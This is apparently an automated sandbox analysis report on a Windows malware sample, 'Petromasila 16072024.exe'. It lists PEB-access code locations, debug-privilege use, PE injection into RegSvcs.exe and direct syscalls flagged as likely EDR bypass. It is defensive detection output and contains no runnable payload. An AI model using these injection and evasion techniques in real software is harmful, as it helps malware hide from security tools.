Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013855E0 mov eax, dword ptr fs:[00000030h]	4_2_013855E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013315EF mov eax, dword ptr fs:[00000030h]	4_2_013315EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013365D0 mov eax, dword ptr fs:[00000030h]	4_2_013365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF5C7 mov eax, dword ptr fs:[00000030h]	4_2_012FF5C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133C5C6 mov eax, dword ptr fs:[00000030h]	4_2_0133C5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013805C6 mov eax, dword ptr fs:[00000030h]	4_2_013805C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB420 mov eax, dword ptr fs:[00000030h]	4_2_012FB420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01389429 mov eax, dword ptr fs:[00000030h]	4_2_01389429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01337425 mov eax, dword ptr fs:[00000030h]	4_2_01337425
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01337425 mov ecx, dword ptr fs:[00000030h]	4_2_01337425
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138F42F mov eax, dword ptr fs:[00000030h]	4_2_0138F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138F42F mov eax, dword ptr fs:[00000030h]	4_2_0138F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138F42F mov eax, dword ptr fs:[00000030h]	4_2_0138F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138F42F mov eax, dword ptr fs:[00000030h]	4_2_0138F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138F42F mov eax, dword ptr fs:[00000030h]	4_2_0138F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F640D mov eax, dword ptr fs:[00000030h]	4_2_012F640D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF409 mov eax, dword ptr fs:[00000030h]	4_2_013BF409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01396400 mov eax, dword ptr fs:[00000030h]	4_2_01396400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01396400 mov eax, dword ptr fs:[00000030h]	4_2_01396400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01308470 mov eax, dword ptr fs:[00000030h]	4_2_01308470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01308470 mov eax, dword ptr fs:[00000030h]	4_2_01308470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF478 mov eax, dword ptr fs:[00000030h]	4_2_013BF478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CA464 mov eax, dword ptr fs:[00000030h]	4_2_013CA464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133D450 mov eax, dword ptr fs:[00000030h]	4_2_0133D450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133D450 mov eax, dword ptr fs:[00000030h]	4_2_0133D450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D454 mov eax, dword ptr fs:[00000030h]	4_2_0130D454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E45E mov eax, dword ptr fs:[00000030h]	4_2_0132E45E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E45E mov eax, dword ptr fs:[00000030h]	4_2_0132E45E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E45E mov eax, dword ptr fs:[00000030h]	4_2_0132E45E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E45E mov eax, dword ptr fs:[00000030h]	4_2_0132E45E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132E45E mov eax, dword ptr fs:[00000030h]	4_2_0132E45E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445 mov eax, dword ptr fs:[00000030h]	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380443 mov eax, dword ptr fs:[00000030h]	4_2_01380443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013984BB mov eax, dword ptr fs:[00000030h]	4_2_013984BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E4BC mov eax, dword ptr fs:[00000030h]	4_2_0133E4BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013024A2 mov eax, dword ptr fs:[00000030h]	4_2_013024A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013024A2 mov ecx, dword ptr fs:[00000030h]	4_2_013024A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138D4A0 mov ecx, dword ptr fs:[00000030h]	4_2_0138D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138D4A0 mov eax, dword ptr fs:[00000030h]	4_2_0138D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138D4A0 mov eax, dword ptr fs:[00000030h]	4_2_0138D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013344A8 mov eax, dword ptr fs:[00000030h]	4_2_013344A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133B490 mov eax, dword ptr fs:[00000030h]	4_2_0133B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133B490 mov eax, dword ptr fs:[00000030h]	4_2_0133B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138C490 mov eax, dword ptr fs:[00000030h]	4_2_0138C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01300485 mov ecx, dword ptr fs:[00000030h]	4_2_01300485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133648A mov eax, dword ptr fs:[00000030h]	4_2_0133648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133648A mov eax, dword ptr fs:[00000030h]	4_2_0133648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133648A mov eax, dword ptr fs:[00000030h]	4_2_0133648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013064F0 mov eax, dword ptr fs:[00000030h]	4_2_013064F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A4F0 mov eax, dword ptr fs:[00000030h]	4_2_0133A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A4F0 mov eax, dword ptr fs:[00000030h]	4_2_0133A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF4FD mov eax, dword ptr fs:[00000030h]	4_2_013BF4FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013294FA mov eax, dword ptr fs:[00000030h]	4_2_013294FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013354E0 mov eax, dword ptr fs:[00000030h]	4_2_013354E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E4EF mov eax, dword ptr fs:[00000030h]	4_2_0133E4EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E4EF mov eax, dword ptr fs:[00000030h]	4_2_0133E4EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F4D0 mov eax, dword ptr fs:[00000030h]	4_2_0132F4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013244D1 mov eax, dword ptr fs:[00000030h]	4_2_013244D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013244D1 mov eax, dword ptr fs:[00000030h]	4_2_013244D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013214C9 mov eax, dword ptr fs:[00000030h]	4_2_013214C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013214C9 mov eax, dword ptr fs:[00000030h]	4_2_013214C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013214C9 mov eax, dword ptr fs:[00000030h]	4_2_013214C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013214C9 mov eax, dword ptr fs:[00000030h]	4_2_013214C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013214C9 mov eax, dword ptr fs:[00000030h]	4_2_013214C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01329723 mov eax, dword ptr fs:[00000030h]	4_2_01329723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB705 mov eax, dword ptr fs:[00000030h]	4_2_012FB705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB705 mov eax, dword ptr fs:[00000030h]	4_2_012FB705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB705 mov eax, dword ptr fs:[00000030h]	4_2_012FB705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB705 mov eax, dword ptr fs:[00000030h]	4_2_012FB705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130471B mov eax, dword ptr fs:[00000030h]	4_2_0130471B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130471B mov eax, dword ptr fs:[00000030h]	4_2_0130471B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF717 mov eax, dword ptr fs:[00000030h]	4_2_013BF717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130D700 mov ecx, dword ptr fs:[00000030h]	4_2_0130D700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C970B mov eax, dword ptr fs:[00000030h]	4_2_013C970B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C970B mov eax, dword ptr fs:[00000030h]	4_2_013C970B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132270D mov eax, dword ptr fs:[00000030h]	4_2_0132270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132270D mov eax, dword ptr fs:[00000030h]	4_2_0132270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132270D mov eax, dword ptr fs:[00000030h]	4_2_0132270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01330774 mov eax, dword ptr fs:[00000030h]	4_2_01330774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01304779 mov eax, dword ptr fs:[00000030h]	4_2_01304779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01304779 mov eax, dword ptr fs:[00000030h]	4_2_01304779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01312760 mov ecx, dword ptr fs:[00000030h]	4_2_01312760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341763 mov eax, dword ptr fs:[00000030h]	4_2_01341763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133A750 mov eax, dword ptr fs:[00000030h]	4_2_0133A750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov eax, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov eax, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov eax, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov ecx, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov eax, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322755 mov eax, dword ptr fs:[00000030h]	4_2_01322755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AE750 mov eax, dword ptr fs:[00000030h]	4_2_013AE750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01333740 mov eax, dword ptr fs:[00000030h]	4_2_01333740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138174B mov eax, dword ptr fs:[00000030h]	4_2_0138174B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138174B mov ecx, dword ptr fs:[00000030h]	4_2_0138174B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF75B mov eax, dword ptr fs:[00000030h]	4_2_012FF75B

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtAllocateVirtualMemory: Direct from: 0x77C7480C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtWriteVirtualMemory: Direct from: 0x77C7482C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtProtectVirtualMemory: Direct from: 0x77C72EBC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtClose: Direct from: 0x77C72A8C
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtCreateKey: Direct from: 0x77C72B8C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtDelayExecution: Direct from: 0x77C72CFC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtCreateUserProcess: Direct from: 0x77C7363C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQueryInformationProcess: Direct from: 0x77C72B46	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtResumeThread: Direct from: 0x77C72EDC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtOpenKeyEx: Direct from: 0x77C72ABC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtCreateFile: Direct from: 0x77C72F0C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtSetInformationThread: Direct from: 0x77C72A6C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQueryAttributesFile: Direct from: 0x77C72D8C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQueryVolumeInformationFile: Direct from: 0x77C72E4C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtDeviceIoControlFile: Direct from: 0x77C72A0C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtOpenSection: Direct from: 0x77C72D2C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtAllocateVirtualMemory: Direct from: 0x77C72B0C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQuerySystemInformation: Direct from: 0x77C747EC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtReadVirtualMemory: Direct from: 0x77C72DAC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtSetInformationThread: Direct from: 0x77C66319	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtOpenFile: Direct from: 0x77C72CEC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQueryInformationToken: Direct from: 0x77C72BCC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtAllocateVirtualMemory: Direct from: 0x77C73BBC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtReadFile: Direct from: 0x77C729FC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtQuerySystemInformation: Direct from: 0x77C72D1C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtUnmapViewOfSection: Direct from: 0x77C72C5C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtNotifyChangeKey: Direct from: 0x77C73B4C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtSetInformationProcess: Direct from: 0x77C72B7C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtAllocateVirtualMemory: Direct from: 0x77C72B1C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtResumeThread: Direct from: 0x77C735CC	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtWriteVirtualMemory: Direct from: 0x77C72D5C	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	NtMapViewOfSection: Direct from: 0x77C72C3C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

